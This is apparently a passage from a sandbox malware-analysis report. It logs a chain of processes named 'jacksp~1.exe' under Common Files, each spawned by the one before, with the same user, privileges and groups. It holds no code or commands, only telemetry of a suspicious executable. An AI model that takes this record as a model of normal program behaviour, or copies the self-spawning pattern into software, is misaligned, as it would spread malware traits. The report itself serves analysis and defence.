[0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 104 os_tid = 0x330 Thread: id = 105 os_tid = 0x67c Thread: id = 106 os_tid = 0x550 Process: id = "30" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x62dd3000" os_pid = "0x790" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x634" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0x714 Thread: id = 108 os_tid = 0x64 Thread: id = 109 os_tid = 0x62c Process: id = "31" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x61b5d000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x790" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 110 os_tid = 0x5bc Thread: id = 111 os_tid = 0x620 Thread: id = 112 os_tid = 0x628 Process: id = "32" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x5d3a2000" os_pid = "0x3d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x55c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0x480 Thread: id = 114 os_tid = 0x320 Thread: id = 115 os_tid = 0x35c Process: id = "33" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x5f1d3000" os_pid = "0x338" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x3d0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 116 os_tid = 0x5c8 Thread: id = 117 os_tid = 0x698 Thread: id = 118 os_tid = 0x64c Process: id = "34" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x5b7cd000" os_pid = "0x5a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x338" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0x6c0 Thread: id = 120 os_tid = 0x6e8 Thread: id = 121 os_tid = 0x6ec Process: id = "35" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x596c6000" os_pid = "0x5f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x5a4" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 122 os_tid = 0x3a0 Thread: id = 123 os_tid = 0x1d0 Thread: id = 124 os_tid = 0x568 Process: id = "36" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x58c61000" os_pid = "0x364" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x5f8" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0x77c Thread: id = 126 os_tid = 0x6bc Thread: id = 127 os_tid = 0x558 Process: id = "37" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x56823000" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x364" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 128 os_tid = 0x524 Thread: id = 129 os_tid = 0x730 Thread: id = 130 os_tid = 0x5cc Process: id = "38" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x55c92000" os_pid = "0x550" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x5dc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 131 os_tid = 0x5ec Thread: id = 132 os_tid = 0x5f4 Thread: id = 133 os_tid = 0x64 Process: id = "39" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x5432e000" os_pid = "0x714" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x550" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 134 os_tid = 0x16c Thread: id = 135 os_tid = 0x584 Thread: id = 136 os_tid = 0x17c Process: id = "40" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x53a3e000" os_pid = "0x24c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x714" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 137 os_tid = 0x44c Thread: id = 138 os_tid = 0x510 Thread: id = 139 os_tid = 0x55c Process: id = "41" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x6079000" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x24c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 140 os_tid = 0x314 Thread: id = 141 os_tid = 0x4bc Thread: id = 142 os_tid = 0x65c Process: id = "42" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x52710000" os_pid = "0x6fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0x320" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 143 os_tid = 0x618 Thread: id = 144 os_tid = 0x524 Thread: id = 145 os_tid = 0x5cc Process: id = "43" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x50d69000" os_pid = "0x62c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0x6fc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 146 os_tid = 0x700 Thread: id = 147 os_tid = 0x6ec Thread: id = 148 os_tid = 0x7b0 Process: id = "44" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4f131000" os_pid = "0x628" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x62c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 149 os_tid = 0x7ac Thread: id = 150 os_tid = 0x340 Thread: id = 151 os_tid = 0x214 Process: id = "45" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4f073000" os_pid = "0x10c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x628" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 152 os_tid = 0x220 Thread: id = 153 os_tid = 0x30c Thread: id = 154 os_tid = 0x328 Process: id = "46" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4c7db000" os_pid = "0x304" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x10c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 155 os_tid = 0x558 Thread: id = 156 os_tid = 0x2e0 Thread: id = 157 os_tid = 0x31c Process: id = "47" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4ad42000" os_pid = "0x4bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0x304" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 158 os_tid = 0x320 Thread: id = 159 os_tid = 0x624 Thread: id = 160 os_tid = 0x324 Process: id = "48" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4a9d0000" os_pid = "0x524" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0x4bc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 161 os_tid = 0x5cc Thread: id = 162 os_tid = 0x7f4 Thread: id = 163 os_tid = 0x170 Process: id = "49" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x49e3f000" os_pid = "0x7a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x524" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 164 os_tid = 0x5a4 Thread: id = 165 os_tid = 0x6c0 Thread: id = 166 os_tid = 0x434 Process: id = "50" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x48881000" os_pid = "0x7c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x7a0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 167 os_tid = 0x750 Thread: id = 168 os_tid = 0x17c Thread: id = 169 os_tid = 0x16c Process: id = "51" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x485a2000" os_pid = "0x620" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0x7c0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 170 os_tid = 0x5b0 Thread: id = 171 os_tid = 0x6a4 Thread: id = 172 os_tid = 0x2a8 Process: id = "52" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x47890000" os_pid = "0x77c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x620" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 173 os_tid = 0x220 Thread: id = 174 os_tid = 0x430 Thread: id = 175 os_tid = 0x480 Process: id = "53" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4702f000" os_pid = "0x58c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0x77c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 176 os_tid = 0x5b4 Thread: id = 177 os_tid = 0x5c0 Thread: id = 178 os_tid = 0x65c Process: id = "54" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4567d000" os_pid = "0x618" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "53" os_parent_pid = "0x58c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 179 os_tid = 0x624 Thread: id = 180 os_tid = 0x320 Thread: id = 181 os_tid = 0x4bc Process: id = "55" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x43d71000" os_pid = "0x12c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0x618" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 182 os_tid = 0x648 Thread: id = 183 os_tid = 0x458 Thread: id = 184 os_tid = 0x1e0 Thread: id = 186 os_tid = 0x248 Process: id = "56" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x43ffe000" os_pid = "0x5ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "55" os_parent_pid = "0x12c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 187 os_tid = 0x604 Thread: id = 188 os_tid = 0x90 Thread: id = 189 os_tid = 0x71c Process: id = "57" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x408ec000" os_pid = "0x340" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x5ac" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], 